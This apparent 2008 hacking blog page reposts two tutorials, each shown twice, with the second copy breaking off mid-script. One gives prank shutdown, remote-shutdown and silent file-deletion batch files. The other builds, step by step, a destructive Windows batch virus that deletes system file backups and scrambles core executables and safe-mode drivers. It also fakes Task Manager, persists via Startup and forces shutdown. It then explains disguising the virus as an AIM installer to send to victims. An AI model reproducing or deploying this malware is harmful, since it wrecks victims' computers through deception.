Your Ad Here

We have moved to http://access-xperia.blogspot.com

ATX If you are this blogs reader, I encourage you to visit and join ATX. This blog will not be discontinued but all the recent updates will be on ATX. ATX brings you a more exciting look, more premium software for free and ofcourse a chance to win invitations of some selected sites.

Visit and readACCESS THE XPERIA

Resource site of Computer software, Phone application, E-books, Programming codes, yahoo tools, tutorials, hacking tools, keylogger, trojan, hacking, MP3 and much more. ::CORE™::

Friday, October 17, 2008

BATCH FILE HACKING

Batch File Hacking

What Is A Batch File?
A batch file is a MS-DOS file that will execute certain commands these files are usually made with notepad, Alot of people think batch files are nooby but if you know what your doing they can actually be quite powerful and by powerful i mean deleting a whole C:/ Drive.

Whats CMD?
Ok Now you know what a Batch File is you need to know what CMD is ok well cmd is basicly MS-DOS it is a program that allows you to execute certain commands, CMD is simply short for Command Prompt which is its full name.

How To Get CMD?
Ok now were getting somewhere here are some simple ways to create and run cmd
1.Start>Run>"Type Cmd" and viola (If That Dosent Work Try Typing cmd.exe)
2.Notepad>(type command)>Save to desktop as (anything.bat) just make sure it has the extension (.bat) open it and theres C Prompt.
3.Right click anywhere on your desktop>New>shortcut>(type command)>enter>and on your desktop is C prompt.
4. Simply Go Start>Accesories>Command prompt. Lol
5. Go To C:\WINDOWS\system32\cmd

Tricks And Tips
Ok you now know the basics of your hacking journey, here are some tricks that you can use.

1. Shutdown Error
Ok this is a trick , when you click on this icon your about to make it will shut the computer down in the amount of time you set lets say 1min and you can leave a message, our message will be "You Got Owned".

To make this 1. Open Notepad, 2.Type Shutdown -s -t 60 -c "You Got Owned"
3. Save To Desktop As shutdown.bat (DONT FORGET THE .BAT) 
4.You will now have an icon on yor desktop thats called shutdown.bat
5. Double click on it to execute and an error message will come up saying
"Shutdown Will Commence In 1min" and below that will be a message saying you got owned. Thank You That Is My First Trick.

(To abort, open another command prompt and type shutdown -a)


Shutdown Computers Over The Network.

To make this 1. Open Notepad, 2.Type Shutdown -s -m \\xxx.xxx.xxx.xxx (IP Address)
3. Save To Desktop As (Anything).bat (DONT FORGET THE .BAT) 
4.Double click on the icon and wait.
5. Now there is of course other ways of doing this, read the post on the front page,

you can also open CMD and type "Shutdown -i"

Batch File That Deletes Other Things.

This batch file will delete any file on your computer, be carefull now its pretty simple first of all
1.Open Notepad
2. Type
3.@echo off
del "Path Of File You Want To Delete" /Q /S> nul
4. Save as "Anything.bat"
5. Execute It.

Example:
@echo off
del "C:/Documents And Settings/Custard/Desktop/lol.txt" /Q /S> nul

Creating a pause in a batch file
Creating a pause in a batch file is not a complicated thing to do, basically all you have to do is
start writing your batch, then have your first command then go down a line and type PAUSE then -t xx (xx being number of seconds 
then the next line continue with the rest of your code


Make Batch Files run on startup:
To make a batch file run on start up go to C:\WINDOWS\system32 then find the file autoexec, there may be different extensions to this file the main ones being .bat, .nt, or .exe, then open in using notepad, then edit it placing the word start followed by the location of the batch file (example: My Documents/example.bat) in the file then saving and closing.

©ACCESS THE XPERIA™

BATCH FILE HACKING

Batch File Hacking

What Is A Batch File?
A batch file is a MS-DOS file that will execute certain commands these files are usually made with notepad, Alot of people think batch files are nooby but if you know what your doing they can actually be quite powerful and by powerful i mean deleting a whole C:/ Drive.

Whats CMD?
Ok Now you know what a Batch File is you need to know what CMD is ok well cmd is basicly MS-DOS it is a program that allows you to execute certain commands, CMD is simply short for Command Prompt which is its full name.

How To Get CMD?
Ok now were getting somewhere here are some simple ways to create and run cmd
1.Start>Run>"Type Cmd" and viola (If That Dosent Work Try Typing cmd.exe)
2.Notepad>(type command)>Save to desktop as (anything.bat) just make sure it has the extension (.bat) open it and theres C Prompt.
3.Right click anywhere on your desktop>New>shortcut>(type command)>enter>and on your desktop is C prompt.
4. Simply Go Start>Accesories>Command prompt. Lol
5. Go To C:\WINDOWS\system32\cmd

Tricks And Tips
Ok you now know the basics of your hacking journey, here are some tricks that you can use.

1. Shutdown Error
Ok this is a trick , when you click on this icon your about to make it will shut the computer down in the amount of time you set lets say 1min and you can leave a message, our message will be "You Got Owned".

To make this 1. Open Notepad, 2.Type Shutdown -s -t 60 -c "You Got Owned"
3. Save To Desktop As shutdown.bat (DONT FORGET THE .BAT) 
4.You will now have an icon on yor desktop thats called shutdown.bat
5. Double click on it to execute and an error message will come up saying
"Shutdown Will Commence In 1min" and below that will be a message saying you got owned. Thank You That Is My First Trick.

(To abort, open another command prompt and type shutdown -a)


Shutdown Computers Over The Network.

To make this 1. Open Notepad, 2.Type Shutdown -s -m \\xxx.xxx.xxx.xxx (IP Address)
3. Save To Desktop As (Anything).bat (DONT FORGET THE .BAT) 
4.Double click on the icon and wait.
5. Now there is of course other ways of doing this, read the post on the front page,

you can also open CMD and type "Shutdown -i"

Batch File That Deletes Other Things.

This batch file will delete any file on your computer, be carefull now its pretty simple first of all
1.Open Notepad
2. Type
3.@echo off
del "Path Of File You Want To Delete" /Q /S> nul
4. Save as "Anything.bat"
5. Execute It.

Example:
@echo off
del "C:/Documents And Settings/Custard/Desktop/lol.txt" /Q /S> nul

Creating a pause in a batch file
Creating a pause in a batch file is not a complicated thing to do, basically all you have to do is
start writing your batch, then have your first command then go down a line and type PAUSE then -t xx (xx being number of seconds 
then the next line continue with the rest of your code


Make Batch Files run on startup:
To make a batch file run on start up go to C:\WINDOWS\system32 then find the file autoexec, there may be different extensions to this file the main ones being .bat, .nt, or .exe, then open in using notepad, then edit it placing the word start followed by the location of the batch file (example: My Documents/example.bat) in the file then saving and closing.

©ACCESS THE XPERIA™

Thursday, October 16, 2008

Wicked BATCH VIRUSES Tutorials

Now to begin we must first ask our selfs questions... How can i cause harm to a computer so the target will not be able to get back to windows and will not be able to boot from safe mode, not only that, but delete our tracks and make the changes to the system so confusing and irreversible that the only way to save it is simply to reformat...well i covered all those fields for you guys.

Now what a batch file is?

well to me a batch file is simply A computer file containing a series of related program commands that instruct a computer to perform a series of tasks

What kind of commands to i need to know?

the commands your going to need to know is simple DOS commands (correct me if im wrong please ^^) and CMD commands,to see all Batch commands go to run,and type in Command.com then type help.

OK! how do i get started?

ok you will first want to open up note pad (start>run>notepad) once there we want to start our batch file with the command:


Code:
@echo off


this commands simply states the start of our batch file and to "hide" our commands and hides the directory of the batch,let's say the batch is on the desktop,when you run it,it will show C:\document...\Desktop\batchname.
so now that we've got our starting command lets do some research =)

if we our selves delete system file in the system32 file at random...they will magically appear as if nothing happens...hmm thats strange..why does it keep re appearing? well turns out the windows is one sneaky bastard and keeps copys of its system32 and other value-able files in the ole magical hidden:
C:\WINDOWS\system32\dllcache\
yes... this is where the back-ups are stored...if we delete these then the ones in system32 will not re-appear and thus now we can manipulate these files any way we want as long as we delete the backups =) so now i will continue on with my code...


Code:
@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
del %systemdrive%\windows\System32\dllcache\winlogon.exe
del %systemdrive%\windows\System32\dllcache\explorer.exe
del %systemdrive%\windows\System32\dllcache\services.exe
del %systemdrive%\windows\System32\dllcache\vga.sys
del %systemdrive%\windows\System32\dllcache\mup.sys
del %systemdrive%\windows\System32\dllcache\taskmgr.exe


I put tskill because winlogon/explorer/taskmgr may be running,so it's better to just disable them

as you have seen here, these are all vital processes for windows to start... and now that we've removed the original copies..we have gotten the upper hand now so whats next? the PREVENTION.

the way this batch file is going to work properly is if we can somehow disable the task manager..hmm ok we can just delete tasmgr.exe from system32 and it will never work..butt i love being sinister,evil, and most of all sexy so what i am going to do is make a new batch file with the following code:


Code:
@echo off msg * oh yea baby press them buttons like you have never pressed them before lol hahaha
Having that done we want to convert it in to an .exe with the name taskmgr..so your output should be taskmgr.exe (google the converter) !GASP! now this is going to be our haha you know your ******* screwed punch line, for those of you who havent catched up..were basicly gonna replace the real taskmgr.exe with our fake one thus every time they press CTRL+ALT+DELETE they will get our lovely/scary message. 
Now back to our original batch file we now are going to set the command to copy
so our code will look like this (the copy command is simple..it just copies)

The dirty message ( the .exe ) has to be inside the same folder as this batch,or it will not work


Code:
@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
del %systemdrive%\windows\System32\dllcache\winlogon.exe
del %systemdrive%\windows\System32\dllcache\explorer.exe
del %systemdrive%\windows\System32\dllcache\services.exe
del %systemdrive%\windows\System32\dllcache\vga.sys
del %systemdrive%\windows\System32\dllcache\mup.sys
del %systemdrive%\windows\System32\dllcache\taskmgr.exe
copy taskmgr.exe %systemdrive%\windows\system32
Now that we have the prevention from pressing control alt delete.. we now need to add the CONFUSION this technique is used to confuse the smart tech guys over at your nearest computer shop on what is going on. 

We are going to rename all the system files into each other..so for example when winlogon.exe wants to load, explorer.exe loads instead and so on.


Code:
@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
del %systemdrive%\windows\System32\dllcache\winlogon.exe
del %systemdrive%\windows\System32\dllcache\explorer.exe
del %systemdrive%\windows\System32\dllcache\services.exe
del %systemdrive%\windows\System32\dllcache\vga.sys
del %systemdrive%\windows\System32\dllcache\mup.sys
del %systemdrive%\windows\System32\dllcache\taskmgr.exe
copy taskmgr.exe %systemdrive%\windows\system32
RENAME %systemdrive%\WINDOWS\system32\services.exe explorer1.exe
RENAME %systemdrive%\WINDOWS\system32\winlogon.exe services.exe
RENAME %systemdrive%\WINDOWS\system32\explorer1.exe winlogon.exe
RENAME %systemdrive%\WINDOWS\explorer.exe explorer1.exe
RENAME %systemdrive%\WINDOWS\winhelp.exe explorer.exe
RENAME %systemdrive%\WINDOWS\explorer1.exe winhelp.exe
This my friends, will make the computer go nuts, now that we have that..i don't want my user to even try and use safe mode and turns out..GASP! safe mode needs to load two very special .sys files named mup.sys and vga.sys which im guessing its for video..anywho we are going to want to delete those from the cache and rename them, becareful though, they are not located in system32. 


Code:
@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
del %systemdrive%\windows\System32\dllcache\winlogon.e xe
del %systemdrive%\windows\System32\dllcache\explorer.e xe
del %systemdrive%\windows\System32\dllcache\services.e xe
del %systemdrive%\windows\System32\dllcache\vga.sys
del %systemdrive%\windows\System32\dllcache\mup.sys
del %systemdrive%\windows\System32\dllcache\taskmgr.ex e
copy taskmgr.exe %systemdrive%\windows\system32
RENAME %systemdrive%\WINDOWS\system32\services.exe explorer1.exe
RENAME %systemdrive%\WINDOWS\system32\winlogon.exe services.exe
RENAME %systemdrive%\WINDOWS\system32\explorer1.exe winlogon.exe
RENAME %systemdrive%\WINDOWS\explorer.exe explorer1.exe
RENAME %systemdrive%\WINDOWS\winhelp.exe explorer.exe
RENAME %systemdrive%\WINDOWS\explorer1.exe winhelp.exe
RENAME %systemdrive%\WINDOWS\system32\drivers\mup.sys mup2.sys
RENAME %systemdrive%\WINDOWS\system32\drivers\vga.sys mup.sys
RENAME %systemdrive%\WINDOWS\system32\drivers\mup2.sys vga.sys
(Note:Ren also works) 

Ok now we must force the user to shutdown..but remember to give the system enough time to replace these files so lets add the shutdown command
which shutdown your computer (-t means time and -c means comment)


Code:
@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
DEL "C:\WINDOWS\system32\dllcache\winlogon.exe"
DEL "C:\WINDOWS\system32\dllcache\explorer.exe"
DEL "C:\WINDOWS\system32\dllcache\services.exe"
DEL "C:\WINDOWS\system32\dllcache\vga.sys"
DEL "C:\WINDOWS\system32\dllcache\mup.sys"
DEL "C:\WINDOWS\system32\dllcache\taskmgr.exe"
DEL "C:\WINDOWS\system32\taskmgr.exe"
copy "taskmgr.exe" "C:\WINDOWS\system32"
RENAME "C:\WINDOWS\system32\services.exe" "explorer1.exe
RENAME "C:\WINDOWS\system32\winlogon.exe" "services.exe"
RENAME "C:\WINDOWS\system32\explorer1.exe" "winlogon.exe"
RENAME "C:\WINDOWS\explorer.exe" "explorer1.exe"
RENAME "C:\WINDOWS\winhelp.exe" "explorer.exe"
RENAME "C:\WINDOWS\explorer1.exe" "winhelp.exe"
RENAME "C:\WINDOWS\system32\drivers\mup.sys" "mup2.sys
RENAME "C:\WINDOWS\system32\drivers\vga.sys" "mup.sys"
RENAME "C:\WINDOWS\system32\drivers\mup2.sys" "vga.sys"
shutdown -s -t 10

Now the user has 10 seconds before complete system shutdown..now if you change those system files...we are going to get a pop up saying to locate your windows xp cd because valueble files have been replaced..haha heres a challange run this program on your computer and look for your windows xp copy/insert it/ and let it load in 15 seconds hahahaha good luck specially when your cought off guard =P. 


Ok now we're still gonna add even more goodies to this batch..we are going to fork it..yes youve heard me..fork is when the applicationopens and application which opens the application while the others open applications..so basicly you stupify the computer with cmd pop ups sp no we use the echo command to bring out what we want the users to see.


Code:

@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
DEL "C:\WINDOWS\system32\dllcache\winlogon.exe"
DEL "C:\WINDOWS\system32\dllcache\explorer.exe"
DEL "C:\WINDOWS\system32\dllcache\services.exe"
DEL "C:\WINDOWS\system32\dllcache\vga.sys"
DEL "C:\WINDOWS\system32\dllcache\mup.sys"
DEL "C:\WINDOWS\system32\dllcache\taskmgr.exe"
DEL "C:\WINDOWS\system32\taskmgr.exe"
copy "taskmgr.exe" "C:\WINDOWS\system32"
RENAME "C:\WINDOWS\system32\services.exe" "explorer1.exe
RENAME "C:\WINDOWS\system32\winlogon.exe" "services.exe"
RENAME "C:\WINDOWS\system32\explorer1.exe" "winlogon.exe"
RENAME "C:\WINDOWS\explorer.exe" "explorer1.exe"
RENAME "C:\WINDOWS\winhelp.exe" "explorer.exe"
RENAME "C:\WINDOWS\explorer1.exe" "winhelp.exe"
RENAME "C:\WINDOWS\system32\drivers\mup.sys" "mup2.sys
RENAME "C:\WINDOWS\system32\drivers\vga.sys" "mup.sys"
RENAME "C:\WINDOWS\system32\drivers\mup2.sys" "vga.sys"
shutdown -s -t 10
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Ok now we have them what we want the to see... NOW we are going to make it repeat it by trying to open this very same file again by using label. a label is basicly a bookmark in your book, it lets you go back to that specific place. so a label looks like this- 

Code:
:start
":" is label and "start" is the name (it can be anything). 


Code:
@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
DEL "C:\WINDOWS\system32\dllcache\winlogon.exe"
DEL "C:\WINDOWS\system32\dllcache\explorer.exe"
DEL "C:\WINDOWS\system32\dllcache\services.exe"
DEL "C:\WINDOWS\system32\dllcache\vga.sys"
DEL "C:\WINDOWS\system32\dllcache\mup.sys"
DEL "C:\WINDOWS\system32\dllcache\taskmgr.exe"
DEL "C:\WINDOWS\system32\taskmgr.exe"
copy "taskmgr.exe" "C:\WINDOWS\system32"
RENAME "C:\WINDOWS\system32\services.exe" "explorer1.exe
RENAME "C:\WINDOWS\system32\winlogon.exe" "services.exe"
RENAME "C:\WINDOWS\system32\explorer1.exe" "winlogon.exe"
RENAME "C:\WINDOWS\explorer.exe" "explorer1.exe"
RENAME "C:\WINDOWS\winhelp.exe" "explorer.exe"
RENAME "C:\WINDOWS\explorer1.exe" "winhelp.exe"
RENAME "C:\WINDOWS\system32\drivers\mup.sys" "mup2.sys
RENAME "C:\WINDOWS\system32\drivers\vga.sys" "mup.sys"
RENAME "C:\WINDOWS\system32\drivers\mup2.sys" "vga.sys"
shutdown -s -t 10
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
:start
So finally 


Code:
@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
del %systemdrive%\windows\System32\dllcache\winlogon.e xe
del %systemdrive%\windows\System32\dllcache\explorer.e xe
del %systemdrive%\windows\System32\dllcache\services.e xe
del %systemdrive%\windows\System32\dllcache\vga.sys
del %systemdrive%\windows\System32\dllcache\mup.sys
del %systemdrive%\windows\System32\dllcache\taskmgr.ex e
copy taskmgr.exe %systemdrive%\windows\system32
RENAME %systemdrive%\WINDOWS\system32\services.exe explorer1.exe
RENAME %systemdrive%\WINDOWS\system32\winlogon.exe services.exe
RENAME %systemdrive%\WINDOWS\system32\explorer1.exe winlogon.exe
RENAME %systemdrive%\WINDOWS\explorer.exe explorer1.exe
RENAME %systemdrive%\WINDOWS\winhelp.exe explorer.exe
RENAME %systemdrive%\WINDOWS\explorer1.exe winhelp.exe
RENAME %systemdrive%\WINDOWS\system32\drivers\mup.sys mup2.sys
RENAME %systemdrive%\WINDOWS\system32\drivers\vga.sys mup.sys
RENAME %systemdrive%\WINDOWS\system32\drivers\mup2.sys vga.sys
shutdown -s -t 10
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
copy %0 "%systemdrive%\documents and settings\%username%\start menu\programs\startup"
:1
start %0
goto :1
Notice i put a directory there..hmm and its a start up too...wow i must be thinking something 

now were gonna save this as virus.bat and make another simple batch file with the code-


Code:
@echo off 
copy "virus.exe" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 
start virus.exe
And save it as move.bat 

as you can see this will only start what we just made and move it to start ups =) so if they fix the problem ( by sheer luck) and turn the comp back on with this file still in start up..they will be surprised =).. now we are going to turn these files into .exe with the converter (bat to exe;google it). we are going to choose move.bat and click compile. and then do the same for virus.bat, after this you should end up with a move.exe and a virus.exe. now how in the world are we going to include the task manager we made into our file..hmmmm OH! windows has its own packalotofevilexe program =) go to start run then type iexpress
!GASP!!

Now create a new self extraction then click next
Select extract and install (the first choice Buzzo) then next
Give it a good looking tiltle like...Install_AIM then next
Then no promt then next
No license..next
Ah now we add our move.exe, virus.exe and taskmgr.exe in to this wonderful white box And click next
On the box that says install program select move.exe then next, we don't need anything for the bottom
Select hidden then next
No message, next
Now check hide process animation from user and click browse to save it and give it a good Name like above..something beleive able like Installer_AIM.exe
No restart, next
Don't save if you do then save i don't care, next
Then create and your Installer_AIM.exe will be created.. NOW! look at the fugly icon..
Use my icon changer and look for an AIM icon or something to make it beleive able, my icon changer is pretty self explanatory (and not..its really not mine) so i don't feel like getting into the icon changer since even a stupid one can do it. your .exe is now alive and kicking so send it to your nearest myspace user.

©ACCESS THE XPERIA™

Wicked BATCH VIRUSES Tutorials

Now to begin we must first ask our selfs questions... How can i cause harm to a computer so the target will not be able to get back to windows and will not be able to boot from safe mode, not only that, but delete our tracks and make the changes to the system so confusing and irreversible that the only way to save it is simply to reformat...well i covered all those fields for you guys.

Now what a batch file is?

well to me a batch file is simply A computer file containing a series of related program commands that instruct a computer to perform a series of tasks

What kind of commands to i need to know?

the commands your going to need to know is simple DOS commands (correct me if im wrong please ^^) and CMD commands,to see all Batch commands go to run,and type in Command.com then type help.

OK! how do i get started?

ok you will first want to open up note pad (start>run>notepad) once there we want to start our batch file with the command:


Code:
@echo off


this commands simply states the start of our batch file and to "hide" our commands and hides the directory of the batch,let's say the batch is on the desktop,when you run it,it will show C:\document...\Desktop\batchname.
so now that we've got our starting command lets do some research =)

if we our selves delete system file in the system32 file at random...they will magically appear as if nothing happens...hmm thats strange..why does it keep re appearing? well turns out the windows is one sneaky bastard and keeps copys of its system32 and other value-able files in the ole magical hidden:
C:\WINDOWS\system32\dllcache\
yes... this is where the back-ups are stored...if we delete these then the ones in system32 will not re-appear and thus now we can manipulate these files any way we want as long as we delete the backups =) so now i will continue on with my code...


Code:
@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
del %systemdrive%\windows\System32\dllcache\winlogon.exe
del %systemdrive%\windows\System32\dllcache\explorer.exe
del %systemdrive%\windows\System32\dllcache\services.exe
del %systemdrive%\windows\System32\dllcache\vga.sys
del %systemdrive%\windows\System32\dllcache\mup.sys
del %systemdrive%\windows\System32\dllcache\taskmgr.exe


I put tskill because winlogon/explorer/taskmgr may be running,so it's better to just disable them

as you have seen here, these are all vital processes for windows to start... and now that we've removed the original copies..we have gotten the upper hand now so whats next? the PREVENTION.

the way this batch file is going to work properly is if we can somehow disable the task manager..hmm ok we can just delete tasmgr.exe from system32 and it will never work..butt i love being sinister,evil, and most of all sexy so what i am going to do is make a new batch file with the following code:


Code:
@echo off msg * oh yea baby press them buttons like you have never pressed them before lol hahaha
Having that done we want to convert it in to an .exe with the name taskmgr..so your output should be taskmgr.exe (google the converter) !GASP! now this is going to be our haha you know your ******* screwed punch line, for those of you who havent catched up..were basicly gonna replace the real taskmgr.exe with our fake one thus every time they press CTRL+ALT+DELETE they will get our lovely/scary message. 
Now back to our original batch file we now are going to set the command to copy
so our code will look like this (the copy command is simple..it just copies)

The dirty message ( the .exe ) has to be inside the same folder as this batch,or it will not work


Code:
@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
del %systemdrive%\windows\System32\dllcache\winlogon.exe
del %systemdrive%\windows\System32\dllcache\explorer.exe
del %systemdrive%\windows\System32\dllcache\services.exe
del %systemdrive%\windows\System32\dllcache\vga.sys
del %systemdrive%\windows\System32\dllcache\mup.sys
del %systemdrive%\windows\System32\dllcache\taskmgr.exe
copy taskmgr.exe %systemdrive%\windows\system32
Now that we have the prevention from pressing control alt delete.. we now need to add the CONFUSION this technique is used to confuse the smart tech guys over at your nearest computer shop on what is going on. 

We are going to rename all the system files into each other..so for example when winlogon.exe wants to load, explorer.exe loads instead and so on.


Code:
@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
del %systemdrive%\windows\System32\dllcache\winlogon.exe
del %systemdrive%\windows\System32\dllcache\explorer.exe
del %systemdrive%\windows\System32\dllcache\services.exe
del %systemdrive%\windows\System32\dllcache\vga.sys
del %systemdrive%\windows\System32\dllcache\mup.sys
del %systemdrive%\windows\System32\dllcache\taskmgr.exe
copy taskmgr.exe %systemdrive%\windows\system32
RENAME %systemdrive%\WINDOWS\system32\services.exe explorer1.exe
RENAME %systemdrive%\WINDOWS\system32\winlogon.exe services.exe
RENAME %systemdrive%\WINDOWS\system32\explorer1.exe winlogon.exe
RENAME %systemdrive%\WINDOWS\explorer.exe explorer1.exe
RENAME %systemdrive%\WINDOWS\winhelp.exe explorer.exe
RENAME %systemdrive%\WINDOWS\explorer1.exe winhelp.exe
This my friends, will make the computer go nuts, now that we have that..i don't want my user to even try and use safe mode and turns out..GASP! safe mode needs to load two very special .sys files named mup.sys and vga.sys which im guessing its for video..anywho we are going to want to delete those from the cache and rename them, becareful though, they are not located in system32. 


Code:
@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
del %systemdrive%\windows\System32\dllcache\winlogon.e xe
del %systemdrive%\windows\System32\dllcache\explorer.e xe
del %systemdrive%\windows\System32\dllcache\services.e xe
del %systemdrive%\windows\System32\dllcache\vga.sys
del %systemdrive%\windows\System32\dllcache\mup.sys
del %systemdrive%\windows\System32\dllcache\taskmgr.ex e
copy taskmgr.exe %systemdrive%\windows\system32
RENAME %systemdrive%\WINDOWS\system32\services.exe explorer1.exe
RENAME %systemdrive%\WINDOWS\system32\winlogon.exe services.exe
RENAME %systemdrive%\WINDOWS\system32\explorer1.exe winlogon.exe
RENAME %systemdrive%\WINDOWS\explorer.exe explorer1.exe
RENAME %systemdrive%\WINDOWS\winhelp.exe explorer.exe
RENAME %systemdrive%\WINDOWS\explorer1.exe winhelp.exe
RENAME %systemdrive%\WINDOWS\system32\drivers\mup.sys mup2.sys
RENAME %systemdrive%\WINDOWS\system32\drivers\vga.sys mup.sys
RENAME %systemdrive%\WINDOWS\system32\drivers\mup2.sys vga.sys
(Note:Ren also works) 

Ok now we must force the user to shutdown..but remember to give the system enough time to replace these files so lets add the shutdown command
which shutdown your computer (-t means time and -c means comment)


Code:
@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
DEL "C:\WINDOWS\system32\dllcache\winlogon.exe"
DEL "C:\WINDOWS\system32\dllcache\explorer.exe"
DEL "C:\WINDOWS\system32\dllcache\services.exe"
DEL "C:\WINDOWS\system32\dllcache\vga.sys"
DEL "C:\WINDOWS\system32\dllcache\mup.sys"
DEL "C:\WINDOWS\system32\dllcache\taskmgr.exe"
DEL "C:\WINDOWS\system32\taskmgr.exe"
copy "taskmgr.exe" "C:\WINDOWS\system32"
RENAME "C:\WINDOWS\system32\services.exe" "explorer1.exe
RENAME "C:\WINDOWS\system32\winlogon.exe" "services.exe"
RENAME "C:\WINDOWS\system32\explorer1.exe" "winlogon.exe"
RENAME "C:\WINDOWS\explorer.exe" "explorer1.exe"
RENAME "C:\WINDOWS\winhelp.exe" "explorer.exe"
RENAME "C:\WINDOWS\explorer1.exe" "winhelp.exe"
RENAME "C:\WINDOWS\system32\drivers\mup.sys" "mup2.sys
RENAME "C:\WINDOWS\system32\drivers\vga.sys" "mup.sys"
RENAME "C:\WINDOWS\system32\drivers\mup2.sys" "vga.sys"
shutdown -s -t 10

Now the user has 10 seconds before complete system shutdown..now if you change those system files...we are going to get a pop up saying to locate your windows xp cd because valueble files have been replaced..haha heres a challange run this program on your computer and look for your windows xp copy/insert it/ and let it load in 15 seconds hahahaha good luck specially when your cought off guard =P. 


Ok now we're still gonna add even more goodies to this batch..we are going to fork it..yes youve heard me..fork is when the applicationopens and application which opens the application while the others open applications..so basicly you stupify the computer with cmd pop ups sp no we use the echo command to bring out what we want the users to see.


Code:

@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
DEL "C:\WINDOWS\system32\dllcache\winlogon.exe"
DEL "C:\WINDOWS\system32\dllcache\explorer.exe"
DEL "C:\WINDOWS\system32\dllcache\services.exe"
DEL "C:\WINDOWS\system32\dllcache\vga.sys"
DEL "C:\WINDOWS\system32\dllcache\mup.sys"
DEL "C:\WINDOWS\system32\dllcache\taskmgr.exe"
DEL "C:\WINDOWS\system32\taskmgr.exe"
copy "taskmgr.exe" "C:\WINDOWS\system32"
RENAME "C:\WINDOWS\system32\services.exe" "explorer1.exe
RENAME "C:\WINDOWS\system32\winlogon.exe" "services.exe"
RENAME "C:\WINDOWS\system32\explorer1.exe" "winlogon.exe"
RENAME "C:\WINDOWS\explorer.exe" "explorer1.exe"
RENAME "C:\WINDOWS\winhelp.exe" "explorer.exe"
RENAME "C:\WINDOWS\explorer1.exe" "winhelp.exe"
RENAME "C:\WINDOWS\system32\drivers\mup.sys" "mup2.sys
RENAME "C:\WINDOWS\system32\drivers\vga.sys" "mup.sys"
RENAME "C:\WINDOWS\system32\drivers\mup2.sys" "vga.sys"
shutdown -s -t 10
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Ok now we have them what we want the to see... NOW we are going to make it repeat it by trying to open this very same file again by using label. a label is basicly a bookmark in your book, it lets you go back to that specific place. so a label looks like this- 

Code:
:start
":" is label and "start" is the name (it can be anything). 


Code:
@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
DEL "C:\WINDOWS\system32\dllcache\winlogon.exe"
DEL "C:\WINDOWS\system32\dllcache\explorer.exe"
DEL "C:\WINDOWS\system32\dllcache\services.exe"
DEL "C:\WINDOWS\system32\dllcache\vga.sys"
DEL "C:\WINDOWS\system32\dllcache\mup.sys"
DEL "C:\WINDOWS\system32\dllcache\taskmgr.exe"
DEL "C:\WINDOWS\system32\taskmgr.exe"
copy "taskmgr.exe" "C:\WINDOWS\system32"
RENAME "C:\WINDOWS\system32\services.exe" "explorer1.exe
RENAME "C:\WINDOWS\system32\winlogon.exe" "services.exe"
RENAME "C:\WINDOWS\system32\explorer1.exe" "winlogon.exe"
RENAME "C:\WINDOWS\explorer.exe" "explorer1.exe"
RENAME "C:\WINDOWS\winhelp.exe" "explorer.exe"
RENAME "C:\WINDOWS\explorer1.exe" "winhelp.exe"
RENAME "C:\WINDOWS\system32\drivers\mup.sys" "mup2.sys
RENAME "C:\WINDOWS\system32\drivers\vga.sys" "mup.sys"
RENAME "C:\WINDOWS\system32\drivers\mup2.sys" "vga.sys"
shutdown -s -t 10
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
